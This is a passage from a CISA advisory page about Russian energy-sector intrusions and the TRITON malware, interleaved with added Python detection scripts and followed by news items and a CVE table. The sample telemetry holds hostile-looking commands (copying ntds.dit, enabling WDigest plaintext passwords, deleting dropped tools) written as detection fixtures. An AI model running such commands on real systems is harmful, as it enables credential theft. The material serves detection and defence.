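Added example, not part of the CISA advisory. Parses the Shell Link (.LNK)
format far enough to read the ICON_LOCATION string and flags entries whose
icon path is a UNC or URL path, which makes Explorer open an outbound SMB
session when the folder is browsed. The sample .lnk built by build_test_lnk()
is a constructed fixture; EXAMPLE-REMOTE-HOST is a placeholder.
"""
import struct
from pathlib import Path
from typing import Optional

# ShellLinkHeader is 76 bytes; LinkFlags sits at offset 20.
HEADER_SIZE = 0x4C
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80
# StringData sections appear in this fixed order, each present only if its flag is set.
STRING_ORDER = (HAS_NAME, HAS_RELATIVE_PATH, HAS_WORKING_DIR, HAS_ARGUMENTS, HAS_ICON_LOCATION)


def _read_string(data: bytes, pos: int, unicode: bool) -> tuple[str, int]:
    """Read one StringData entry: uint16 character count, then the characters (no terminator)."""
    (count,) = struct.unpack_from("<H", data, pos)
    pos += 2
    if unicode:
        raw = data[pos:pos + 2 * count]
        return raw.decode("utf-16-le", errors="replace"), pos + 2 * count
    raw = data[pos:pos + count]
    return raw.decode("latin-1"), pos + count


def icon_location(data: bytes) -> Optional[str]:
    """Return the ICON_LOCATION string of a .lnk, or None if absent or not a shell link."""
    if len(data) < HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LINK_CLSID:
        return None
    (flags,) = struct.unpack_from("<I", data, 20)
    pos = HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # skip LinkTargetIDList: uint16 size + that many bytes
        (size,) = struct.unpack_from("<H", data, pos)
        pos += 2 + size
    if flags & HAS_LINK_INFO:                # skip LinkInfo: uint32 size that includes itself
        (size,) = struct.unpack_from("<I", data, pos)
        pos += size
    unicode = bool(flags & IS_UNICODE)
    for flag in STRING_ORDER:
        if not flags & flag:
            continue
        text, pos = _read_string(data, pos, unicode)
        if flag == HAS_ICON_LOCATION:
            return text
    return None


def is_remote_icon(path: Optional[str]) -> bool:
    """UNC (\\\\host\\share) and URL-style icon paths trigger a network fetch on browse."""
    if not path:
        return False
    p = path.strip().lower()
    return p.startswith("\\\\") or p.startswith("//") or "://" in p


def scan_directory(root: str) -> list[tuple[str, str]]:
    """Return (file, icon_path) for every .lnk under root whose icon path is remote."""
    hits = []
    for lnk in Path(root).rglob("*.lnk"):
        icon = icon_location(lnk.read_bytes())
        if is_remote_icon(icon):
            hits.append((str(lnk), icon))
    return hits


def build_test_lnk(icon: str) -> bytes:
    """Constructed fixture: a minimal .lnk carrying only a Unicode ICON_LOCATION string."""
    header = struct.pack("<I", HEADER_SIZE) + LINK_CLSID
    header += struct.pack("<I", HAS_ICON_LOCATION | IS_UNICODE)  # LinkFlags
    header += b"\x00" * (HEADER_SIZE - len(header))             # attributes, times, size, etc.
    return header + struct.pack("<H", len(icon)) + icon.encode("utf-16-le")


if __name__ == "__main__":
    sample = build_test_lnk(r"\\EXAMPLE-REMOTE-HOST\share\icon.ico")  # placeholder host
    print(icon_location(sample), is_remote_icon(icon_location(sample)))
```

Run scan_directory() against a mounted share to list shortcuts whose icon would be fetched from another host; a hit pointing outside the organisation's own file servers is worth an incident ticket.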
OS Credential Dumping: Local Security Authority Subsystem Service (LSASS) Memory [T1003.001]

The threat actor used an Administrator PowerShell prompt to enable the WDigest authentication protocol to store plaintext passwords in the LSASS memory. With this enabled, credential harvesting tools can dump passwords from this process’s memory.

Operating System Configuration: make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.

Password Policies: set and enforce secure password policies for accounts.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

Privileged Process Integrity: protect processes with high privileges that can be used to interact with critical system components through use of protected process light, anti-process injection defenses, or other process integrity enforcement measures.

User Training: train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.

Credential Access Protection: use capabilities to prevent successful credential access by adversaries; including blocking forms of credential dumping.

OS Credential Dumping: NTDS [T1003.003]

The threat actor collected ntds.dit files. The file ntds.dit is the Active Directory (AD) database that contains all information related to the AD, including encrypted user passwords.

Monitor: monitor processes and command-line arguments for program execution that may be indicative of credential dumping, especially attempts to access or copy the NTDS.dit.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

User Training: train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.

Discovery [TA0007]

Remote System Discovery [T1018]

The threat actor used privileged credentials to access the Energy Sector victim’s domain controller. Once on the domain controller, the threat actors used batch scripts dc.bat and dit.bat to enumerate hosts, users, and additional information about the environment. 

Note: this activity also applies to: 

  • Tactic: Persistence [TA0003], Technique: Valid Accounts: Domain Accounts [T1078.002]
  • Tactic: Discovery [TA0007], Technique: System Owner/User Discovery [T1033]

Monitor: normal, benign system and network events related to legitimate remote system discovery may be uncommon, depending on the environment and how they are used.

Monitor processes and command-line arguments for actions that could be taken to gather system and network information.

Monitor for processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.
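
Several of the detection notes in this section (web servers running cmd.exe, command-line deletion of dropped tools such as scr.exe, enabling WDigest, access to NTDS.dit, and ping.exe/tracert.exe runs in quick succession) can be expressed as rules over endpoint telemetry. The following added example, not part of the advisory, does that over constructed Sysmon-style events; host names, paths, thresholds and rule names are assumptions.

```python
"""Host-telemetry detection rules for several techniques mapped in this advisory.

Added example, not part of the advisory or of any vendor product. It runs over
constructed Sysmon-style events (process creation and registry value set) and
alerts on: a web server process spawning a command shell, a shell command line
deleting a dropped tool, the WDigest UseLogonCredential value being set to 1,
command lines referencing ntds.dit, and bursts of ping.exe/tracert.exe from one
host. Thresholds and names are assumptions for the example.
"""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

WEB_SERVER_PROCS = {"w3wp.exe", "httpd.exe", "nginx.exe", "tomcat.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
DISCOVERY_TOOLS = {"ping.exe", "tracert.exe"}
# cmd.exe deletion builtins and common deletion tools, matched as whole words only.
DELETION_RE = re.compile(r"(?<![\w-])(del|erase|rm|remove-item|sdelete)(\.exe)?(?![\w-])", re.I)
WDIGEST_VALUE = r"hklm\system\currentcontrolset\control\securityproviders\wdigest\uselogoncredential"
BURST_COUNT, BURST_WINDOW = 5, timedelta(seconds=30)


def _base(image):
    """File name of an image path, lower-cased."""
    return image.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, host, detail) tuples for a time-ordered list of event dicts."""
    alerts = []
    recent = defaultdict(deque)  # host -> timestamps of recent discovery-tool launches
    for e in events:
        host = e["host"]
        if e["type"] == "registry":
            # Sysmon Event ID 13 style record: a value written under the WDigest key.
            if e["key"].lower() == WDIGEST_VALUE and e["value"] == 1:
                alerts.append(("wdigest_plaintext_enabled", host,
                               f"{_base(e['image'])} set UseLogonCredential=1"))
            continue
        image, parent = _base(e["image"]), _base(e.get("parent", ""))
        cmd = e.get("cmdline", "")
        if parent in WEB_SERVER_PROCS and image in SHELLS:
            alerts.append(("webserver_spawned_shell", host, f"{parent} -> {image}: {cmd}"))
        # DEL is a cmd.exe builtin: it is only visible when telemetry records the launching
        # "cmd.exe /c del ..." line; a del typed into an existing shell produces no
        # process-creation event, which is the gap the advisory points out.
        if image in SHELLS and DELETION_RE.search(cmd):
            alerts.append(("cmdline_file_deletion", host, cmd))
        if "ntds.dit" in cmd.lower():
            alerts.append(("ntds_dit_access", host, cmd))
        if image in DISCOVERY_TOOLS:
            q = recent[host]
            q.append(e["ts"])
            while q and e["ts"] - q[0] > BURST_WINDOW:
                q.popleft()
            if len(q) == BURST_COUNT:  # fire once, when the threshold is first reached
                alerts.append(("discovery_burst", host,
                               f"{BURST_COUNT} {image} runs within {BURST_WINDOW.seconds}s"))
    return alerts


# ---- constructed sample telemetry (not real logs) ----
T0 = datetime(2022, 3, 24, 12, 0, 0)


def ev(sec, host, image, parent="", cmdline="", typ="process", key="", value=None):
    return {"ts": T0 + timedelta(seconds=sec), "host": host, "type": typ, "image": image,
            "parent": parent, "cmdline": cmdline, "key": key, "value": value}


SAMPLE_EVENTS = [
    ev(0, "WEB01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\inetsrv\w3wp.exe",
       "cmd.exe /c whoami"),
    ev(60, "WS07", r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe",
       r"cmd.exe /c del /f C:\Windows\Temp\scr.exe"),
    ev(120, "WS07", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", typ="registry",
       key=r"HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential",
       value=1),
    ev(200, "DC01", r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\cmd.exe",
       r"cmd.exe /c copy C:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit"),
] + [
    ev(300 + 2 * i, "DC01", r"C:\Windows\System32\PING.EXE", r"C:\Windows\System32\cmd.exe",
       f"ping -n 1 10.0.0.{i + 1}") for i in range(5)
] + [
    ev(400, "WS07", r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for rule, host, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {host}: {detail}")
```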

The threat actor accessed workstations and servers on corporate networks that contained data output from control systems within energy generation facilities. The threat actors accessed files pertaining to ICS or supervisory control and data acquisition (SCADA) systems. 

The actor targeted and copied profile and configuration information for accessing ICS systems on the network. The threat actor copied Virtual Network Connection (VNC) profiles that contained configuration information on accessing ICS systems and took screenshots of a Human Machine Interface (HMI).

Note: this activity also applies to:

  • Tactic: Discovery [TA0007], Technique: File and Directory Discovery [T1083]
  • Tactic: Collection [TA0009], Technique: Screen Capture [T1113]

File and Directory Discovery [T1083]

The actor used dirsb.bat to gather folder and file names from hosts on the network.

Note: this activity also applies to: 

  • Tactic: Execution [TA0002], Technique: Command and Scripting Interpreter: Windows Command Shell [T1059.003]

This type of attack technique cannot be easily mitigated with preventive controls since it is based on the abuse of system features. Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information.

The threat actor conducted reconnaissance operations within the network. The threat actor focused on identifying and browsing file servers within the intended victim’s network.

Lateral Movement [TA0008]

Lateral Tool Transfer [T1570]

The threat actor moved laterally via PsExec, batch scripts, RDP, VNC, and admin shares.

Note: this activity also applies to:

  • Tactic: Lateral Movement [TA0008], Techniques: 
    • Remote Services: Remote Desktop Protocol [T1021.001]
    • Remote Services: SMB/Windows Admin Shares [T1021.002]
    • Remote Services: VNC [T1021.005]

Network Intrusion Prevention: use intrusion detection signatures to block traffic at network boundaries.

Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.

Operating System Configuration: make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.

Privileged Account Management: manage the creation of, modification of, use of, and permissions associated with privileged accounts, including SYSTEM and root.

User Account Management: manage the creation of, modification of, use of, and permissions associated with user accounts.

Disable or Remove Feature or Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Limit Access to Resource Over Network: prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.

Filter Network Traffic: use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.

Limit Software Installation: block users or groups from installing unapproved software.

Collection [TA0009]

Data from Local System [T1005]

The threat actor collected the Windows SYSTEM registry hive file, which contains host configuration information.

Monitor: monitor processes and command-line arguments for actions that could be taken to collect files from a system. Remote access tools with built-in features may interact directly with the Windows API to gather data.

Data may also be acquired through Windows system management tools such as WMI and PowerShell.

Archive Collected Data: Archive via Utility [T1560.001]

The threat actor compressed the ntds.dit file and the SYSTEM registry hive they had collected into archives named SYSTEM.zip and comps.zip.

Audit: audit or scan systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.

Screen Capture [T1113]

The threat actor used Windows’ Scheduled Tasks and batch scripts to execute scr.exe and collect additional information from hosts on the network. The tool scr.exe is a screenshot utility that the threat actor used to capture the screen of systems across the network.

Note: this activity also applies to: 

  • Tactic: Execution [TA0002], Techniques: 
    • Command and Scripting Interpreter: Windows Command Shell [T1059.003]
    • Scheduled Task/Job: Scheduled Task [T1053.005]

Network Segmentation: architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network.

MFA: enforce use of two or more pieces of evidence (such as username and password plus a token, e.g., a physical smart card or token generator) to authenticate to a system.

Limit Access to Resource Over Network: prevent access to file shares, remote access to systems, and unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.

Disable or Remove Feature or Program: remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.

The actor used batch scripts labeled pss.bat and psc.bat to run the PsExec tool. PsExec was used to execute scr.exe across the network and to collect screenshots of systems in a text file.

Note: this activity also applies to: 

  • Tactic: Execution [TA0002], Techniques: 
    • Command and Scripting Interpreter: Windows Command Shell [T1059.003]
    • System Services: Service Execution [T1569.002]

Command and Control [TA0011]

Ingress Tool Transfer [T1105]

The threat actor downloaded tools from a remote server.

Monitor: monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as File Transfer Protocol, that does not normally occur may also be suspicious.

Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.

Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.

Use intrusion detection signatures to block traffic at network boundaries.

 

TRITON Malware

Table 4 maps TRITON’s capabilities to the ATT&CK for ICS framework. For mitigations to harden ICS/OT environments, refer to the Mitigations section of this advisory.

Table 4: ICS Domain Tactics and Techniques for TRITON [4]

Initial Access

Engineering Workstation Compromise [T0818]

TRITON compromises workstations within the safety network.

Execution

Change Operating Mode [T0858]

Note: this technique also applies to Evasion.

TRITON can halt or run a program through the TriStation protocol. (Note: TriStation protocol is the protocol that Triconex System software uses to communicate with the Tricon PLCs.) 

Execution through API [T0871]

TRITON leverages a custom implementation of the TriStation protocol, which triggers APIs related to program download, program allocation, and program changes.

Hooking [T0874]

Note: this technique also applies to Tactic: Privilege Escalation.

TRITON’s injector modifies the address of the handler for a TriStation protocol command so that when the command is received, the payload may be executed instead of normal processing.

Modify Controller Tasking [T0821]

Some TRITON components are added to the program table on the Tricon so that they are executed by the firmware once each cycle.

Native API [T0834]

TRITON’s payload takes commands from TsHi.ExplReadRam(Ex), TsHi.ExplWriteRam(Ex), and TsHi.ExplExec functions to perform operations on controller memory and registers using syscalls written in PowerPC shellcode.

Scripting [T0853]

TRITON communicates with Triconex Tricon PLCs using its custom Python script. This Python script communicates using four Python modules that collectively implement the TriStation protocol via User Datagram Protocol (UDP) 1502.

Note: this use also applies to:

Persistence 

System Firmware [T0857]

Note: this technique also applies to Tactic: Inhibit Response Function.

TRITON’s injector injects the payload into the Tricon PLCs’ running firmware. A threat actor can use the payload to read and write memory on the PLC and execute code at an arbitrary address within the firmware. If the memory address it writes to is within the firmware region, the malicious payload disables address translation, writes the code at the provided address, flushes the instruction cache, and re-enables address translation. This allows the malware to change the running firmware.

Privilege Escalation

Exploitation for Privilege Escalation [T0890]

TRITON can gain supervisor-level access and control system states by exploiting a vulnerability.

Evasion

Exploitation for Evasion [T0820]

TRITON’s injector exploits a vulnerability in the device firmware to escalate privileges and then disables (and later patches) a firmware RAM/ROM consistency check.

Indicator Removal on Host [T0872]

After running the malicious payload, TRITON’s Python script overwrites the malicious payload with a “dummy” program.

Masquerading [T0849]

TRITON’s Python script masquerades as legitimate Triconex software.

TRITON’s injector masquerades as a standard compiled PowerPC program for the Triconex PLC.

Discovery

Remote System Discovery [T0846]

TRITON’s Python script can autodetect Triconex PLCs on the network by sending a UDP broadcast packet over port 1502.
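
Both the custom TriStation implementation and the PLC autodetection above use UDP port 1502, which gives defenders a network-level detection hook. The following added example, not from the advisory, checks constructed Zeek-style connection records for UDP/1502 traffic sent to a broadcast address or originating from a host that is not an approved engineering workstation; the network, the PLC addresses and the allowlist are placeholders.

```python
"""Flag TriStation (UDP/1502) traffic that breaks an engineering-workstation allowlist.

Added example, not from the advisory or from the controller vendor. It reads
constructed Zeek-style conn records (tab-separated: ts, src, sport, dst, dport,
proto) and alerts on (1) a UDP/1502 datagram addressed to a broadcast address,
the pattern of TRITON's PLC autodetection, and (2) UDP/1502 traffic to a PLC
from a source that is not an approved workstation. All addresses are placeholders.
"""
import ipaddress

TRISTATION_PORT = 1502
SAFETY_NET = ipaddress.ip_network("10.20.30.0/24")   # placeholder safety-system network
APPROVED_EWS = {"10.20.30.10"}                         # placeholder TriStation workstation(s)
PLCS = {"10.20.30.101", "10.20.30.102"}                # placeholder Tricon controller addresses

# Constructed records, not captured traffic: two approved sessions, one broadcast
# probe from an unknown host, one unicast from that host, and unrelated TCP/502.
SAMPLE_CONN_LOG = """\
1648123200.10\t10.20.30.10\t49152\t10.20.30.101\t1502\tudp
1648123201.22\t10.20.30.10\t49153\t10.20.30.102\t1502\tudp
1648123300.00\t10.20.30.55\t51000\t10.20.30.255\t1502\tudp
1648123301.50\t10.20.30.55\t51001\t10.20.30.101\t1502\tudp
1648123302.00\t10.20.30.55\t51002\t10.20.30.101\t502\ttcp
"""


def parse_conn(text):
    """Yield one dict per record line; comment lines and malformed lines are skipped."""
    for line in text.splitlines():
        parts = line.split("\t")
        if line.startswith("#") or len(parts) != 6:
            continue
        ts, src, sport, dst, dport, proto = parts
        try:
            yield {"ts": float(ts), "src": src, "sport": int(sport), "dst": dst,
                   "dport": int(dport), "proto": proto.lower()}
        except ValueError:
            continue


def is_broadcast(addr, net=SAFETY_NET):
    """True for the subnet's directed broadcast or the limited broadcast address."""
    ip = ipaddress.ip_address(addr)
    return ip == net.broadcast_address or ip == ipaddress.ip_address("255.255.255.255")


def analyze(records):
    """Return (rule, src, dst) alerts for TriStation traffic outside the allowlist."""
    alerts = []
    for r in records:
        if r["proto"] != "udp" or r["dport"] != TRISTATION_PORT:
            continue
        if is_broadcast(r["dst"]):
            alerts.append(("tristation_broadcast_discovery", r["src"], r["dst"]))
        elif r["dst"] in PLCS and r["src"] not in APPROVED_EWS:
            alerts.append(("tristation_from_unapproved_host", r["src"], r["dst"]))
    return alerts


def analyze_text(text=SAMPLE_CONN_LOG):
    return analyze(parse_conn(text))


if __name__ == "__main__":
    for rule, src, dst in analyze_text():
        print(f"[{rule}] {src} -> {dst}")
```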

Lateral Movement

Program Download [T0843]

TRITON leverages the TriStation protocol to download programs to the Tricon PLCs.

Collection

Detect Operating Mode [T0868]

A TRITON Python module provides string representations of different features of the TriStation protocol, including message and error codes, key position states, and other values returned by the status functions.

Program Upload [T0845]

TRITON uploads its payload to the Tricon PLCs.

Impair Process Control

Unauthorized Command Message [T0855]

A threat actor can use TRITON to prevent the Tricon PLC from functioning appropriately.

Impact

Loss of Safety [T0880]

TRITON can reprogram the safety PLC logic to allow unsafe conditions or state to persist.

Revisions

  • March 24, 2022: Initial Version


State-Sponsored Russian Cyber Actors Targeted Energy Sector from 2011 to 2018

Original release date: March 24, 2022

CISA, the Federal Bureau of Investigation, and the Department of Energy have released a joint Cybersecurity Advisory (CSA) detailing campaigns conducted by state-sponsored Russian cyber actors from 2011 to 2018 that targeted U.S. and international Energy Sector organizations. The CSA highlights historical tactics, techniques, and procedures as well as mitigations Energy Sector organizations can take now to protect their networks. 

CISA encourages all critical infrastructure organizations to review joint CSA: Tactics, Techniques, and Procedures of Indicted State-Sponsored Russian Cyber Actors Targeting the Energy Sector and apply the recommendations. For more information on Russian state-sponsored malicious cyber activity, see CISA’s Russia Cyber Threat Overview and Advisories page.


Just-Released Dark Souls Game, Elden Ring, Includes Killer Bug

A patch fixes exploit hidden in Elden Ring that traps PC players in a ‘death loop.’

Russia Lays Groundwork for Cyberattacks on US Infrastructure – White House

“Evolving intelligence” shows Russia amping up for cyber-war in response to Ukraine-related sanctions, the White House said — but researchers warn that many orgs are not prepared.

FBI and FinCEN Release Advisory on AvosLocker Ransomware

Original release date: March 22, 2022

The Federal Bureau of Investigation (FBI) and the Department of the Treasury’s Financial Crimes Enforcement Network (FinCEN) have released a joint Cybersecurity Advisory identifying indicators of compromise associated with AvosLocker ransomware. AvosLocker is a ransomware-as-a-service affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including, but not limited to, the Financial Services, Critical Manufacturing, and Government Facilities sectors. 

CISA encourages organizations to review the joint Cybersecurity Advisory and apply the recommended mitigations.


Vulnerability Summary for the Week of March 14, 2022

Original release date: March 21, 2022

 

High Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
10web — photo_gallery | The Photo Gallery by 10Web WordPress plugin before 1.6.0 does not validate and escape the bwg_tag_id_bwg_thumbnails_0 parameter before using it in a SQL statement via the bwg_frontend_data AJAX action (available to unauthenticated and authenticated users), leading to an unauthenticated SQL injection | 2022-03-14 | 7.5 | CVE-2022-0169 (MISC, CONFIRM)
adobe — illustrator | Adobe Illustrator version 26.0.3 (and earlier) is affected by a buffer overflow vulnerability due to insecure handling of a crafted file, potentially resulting in arbitrary code execution in the context of the current user. Exploitation requires user interaction in that a victim must open a crafted file in Illustrator. | 2022-03-11 | 9.3 | CVE-2022-23187 (MISC)
apache — http_server | Out-of-bounds Write vulnerability in mod_sed of Apache HTTP Server allows an attacker to overwrite heap memory with possibly attacker provided data. This issue affects Apache HTTP Server 2.4 version 2.4.52 and prior versions. | 2022-03-14 | 7.5 | CVE-2022-23943 (MISC, MLIST)
apache — http_server | Apache HTTP Server 2.4.52 and earlier fails to close inbound connection when errors are encountered discarding the request body, exposing the server to HTTP Request Smuggling | 2022-03-14 | 7.5 | CVE-2022-22720 (MISC, MLIST)
bluproducts — g90_firmware | An issue was discovered in Luna Simo PPR1.180610.011/202001031830. A pre-installed app with a package name of com.skyroam.silverhelper writes three IMEI values to system properties at system startup. The system property values can be obtained via getprop by all third-party applications co-located on the device, even those with no permissions granted, exposing the IMEI values to processes without enforcing any access control. | 2022-03-11 | 7.2 | CVE-2021-41850 (MISC, MISC, MISC, MISC)
dell — alienware_13_r3_firmware | Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM. | 2022-03-11 | 7.2 | CVE-2022-24420 (MISC)
dell — alienware_13_r3_firmware | Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM. | 2022-03-11 | 7.2 | CVE-2022-24419 (MISC)
dell — alienware_13_r3_firmware | Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM. | 2022-03-11 | 7.2 | CVE-2022-24416 (MISC)
dell — alienware_13_r3_firmware | Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM. | 2022-03-11 | 7.2 | CVE-2022-24415 (MISC)
dell — alienware_13_r3_firmware | Dell BIOS contains an improper input validation vulnerability. A local authenticated malicious user may potentially exploit this vulnerability by using an SMI to gain arbitrary code execution during SMM. | 2022-03-11 | 7.2 | CVE-2022-24421 (MISC)
lg — webos | The public API error causes for the attacker to be able to bypass API access control. | 2022-03-11 | 7.5 | CVE-2022-23730 (MISC)
molie_instructure_canvas_linking_tool_project — molie_instructure_canvas_linking_tool | The MOLIE WordPress plugin through 0.5 does not validate and escape a post parameter before using in a SQL statement, leading to an SQL Injection | 2022-03-14 | 7.5 | CVE-2021-25007 (MISC)
nystudio107 — seomatic | A Server-side Template Injection (SSTI) vulnerability exists in Nystudio107 Seomatic 3.4.12 in src/helpers/UrlHelper.php via the host header. | 2022-03-11 | 7.5 | CVE-2021-44618 (MISC, MISC)
parseplatform — parse-server | Parse Server is an open source http web server backend. In versions prior to 4.10.7 there is a Remote Code Execution (RCE) vulnerability in Parse Server. This vulnerability affects Parse Server in the default configuration with MongoDB. The main weakness that leads to RCE is the Prototype Pollution vulnerable code in the file `DatabaseController.js`, so it is likely to affect Postgres and any other database backend as well. This vulnerability has been confirmed on Linux (Ubuntu) and Windows. Users are advised to upgrade as soon as possible. The only known workaround is to manually patch your installation with code referenced at the source GHSA-p6h4-93qp-jhcm. | 2022-03-12 | 7.5 | CVE-2022-24760 (CONFIRM, MISC)
ponton — x/p_messenger | An issue was discovered in PONTON X/P Messenger before 3.11.2. Due to path traversal in private/SchemaSetUpload.do for uploaded ZIP files, an executable script can be uploaded by web application administrators, giving the attacker remote code execution on the underlying server via an imgs/*.jsp URI. | 2022-03-13 | 7.5 | CVE-2021-45887 (MISC, MISC)
simple-git_project — simple-git | The package simple-git before 3.3.0 are vulnerable to Command Injection via argument injection. When calling the .fetch(remote, branch, handlerFn) function, both the remote and branch parameters are passed to the git fetch subcommand. By injecting some git options it was possible to get arbitrary command execution. | 2022-03-11 | 7.5 | CVE-2022-24433 (MISC, MISC, MISC, MISC)
totolink — a3100r_firmware | A Command Injection vulnerability exists in TOTOLINK A3100R <=V4.1.2cu.5050_B20200504 in adm/ntm.asp via the hosTime parameters. | 2022-03-11 | 7.5 | CVE-2021-44620 (MISC, MISC, MISC, MISC)
tribalsystems — zenario | Zenario CMS 9.0.54156 is vulnerable to File Upload. The web server can be compromised by uploading and executing a web-shell which can run commands, browse system files, browse local resources, attack other servers, and exploit the local vulnerabilities, and so forth. | 2022-03-14 | 7.5 | CVE-2021-42171 (MISC)
wptaskforce — wpcargo_track_&_trace | The WPCargo Track & Trace WordPress plugin before 6.9.0 contains a file which could allow unauthenticated attackers to write a PHP file anywhere on the web server, leading to RCE | 2022-03-14 | 7.5 | CVE-2021-25003 (MISC)
yokogawa — centum_vp_firmware | The following Yokogawa Electric products hard-code the password for CAMS server applications: CENTUM VP versions from R5.01.00 to R5.04.20 and versions from R6.01.00 to R6.08.00, Exaopc versions from R3.72.00 to R3.79.00 | 2022-03-11 | 7.5 | CVE-2022-23402 (CONFIRM)


Medium Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
abb — ellipse_enterprise_asset_management | An attacker could trick a user of Hitachi ABB Power Grids Ellipse Enterprise Asset Management (EAM) versions prior to and including 9.0.25 into visiting a malicious website posing as a login page for the Ellipse application and gather authentication credentials. | 2022-03-11 | 4.3 | CVE-2021-27414 (CONFIRM, CONFIRM)
abb — ellipse_enterprise_asset_management | An attacker could exploit this vulnerability in Hitachi ABB Power Grids Ellipse Enterprise Asset Management (EAM) versions prior to and including 9.0.25 by tricking a user to click on a link containing malicious code that would then be run by the web browser. This can result in the compromise of confidential information, or even the takeover of the user’s session. | 2022-03-11 | 5.8 | CVE-2021-27416 (CONFIRM, CONFIRM)
alibaba — nacos | A Cross Site Scripting (XSS) vulnerability exists in Nacos 2.0.3 in auth/users via the (1) pageSize and (2) pageNo parameters. | 2022-03-11 | 4.3 | CVE-2021-44667 (MISC)
alist_project — alist | Alist v2.1.0 and below was discovered to contain a cross-site scripting (XSS) vulnerability via /i/:data/ipa.plist. | 2022-03-12 | 4.3 | CVE-2022-26533 (MISC)
apache — http_server | A carefully crafted request body can cause a read to a random memory area which could cause the process to crash. This issue affects Apache HTTP Server 2.4.52 and earlier. | 2022-03-14 | 5 | CVE-2022-22719 (MISC, MLIST)
apache — http_server | If LimitXMLRequestBody is set to allow request bodies larger than 350MB (defaults to 1M) on 32 bit systems an integer overflow happens which later causes out of bounds writes. This issue affects Apache HTTP Server 2.4.52 and earlier. | 2022-03-14 | 6.8 | CVE-2022-22721 (MISC, MLIST)
atlassian — crucible | The DefaultRepositoryAdminService class in Fisheye and Crucible before version 4.8.9 allowed remote attackers, who have ‘can add repository permission’, to enumerate the existence of internal network and filesystem resources via a Server-Side Request Forgery (SSRF) vulnerability. | 2022-03-14 | 4 | CVE-2021-43954 (MISC, MISC)
bestwebsoft — error_log_viewer | The Error Log Viewer WordPress plugin through 1.1.1 does not validate the path of the log file to clear, allowing high privilege users to clear arbitrary files on the web server, including those outside of the blog folder | 2022-03-14 | 4 | CVE-2021-24966 (MISC)
bwp-google-xml-sitemaps_project — bwp-google-xml-sitemaps | The Better WordPress Google XML Sitemaps WordPress plugin through 1.4.1 does not sanitise and escape its logs when outputting them in the admin dashboard, which could allow unauthenticated users to perform Stored Cross-Site Scripting attacks against admins | 2022-03-14 | 4.3 | CVE-2022-0230 (MISC)
contact-form-submission_project — contact-form-submission The Contact Form Submissions WordPress plugin before 1.7.3 does not sanitise and escape additional fields in contact form requests before outputting them in the related submission. As a result, an unauthenticated attacker could perform Cross-Site Scripting attacks against admins viewing the malicious submission. 2022-03-14 4.3 CVE-2022-0248
MISC
CONFIRM
cookieinformation — wp-gdpr-compliance The Cookie Information | Free GDPR Consent Solution WordPress plugin before 2.0.8 does not escape user data before outputting it back in attributes in the admin dashboard, leading to a Reflected Cross-Site Scripting issue 2022-03-14 4.3 CVE-2022-0147
MISC
CONFIRM
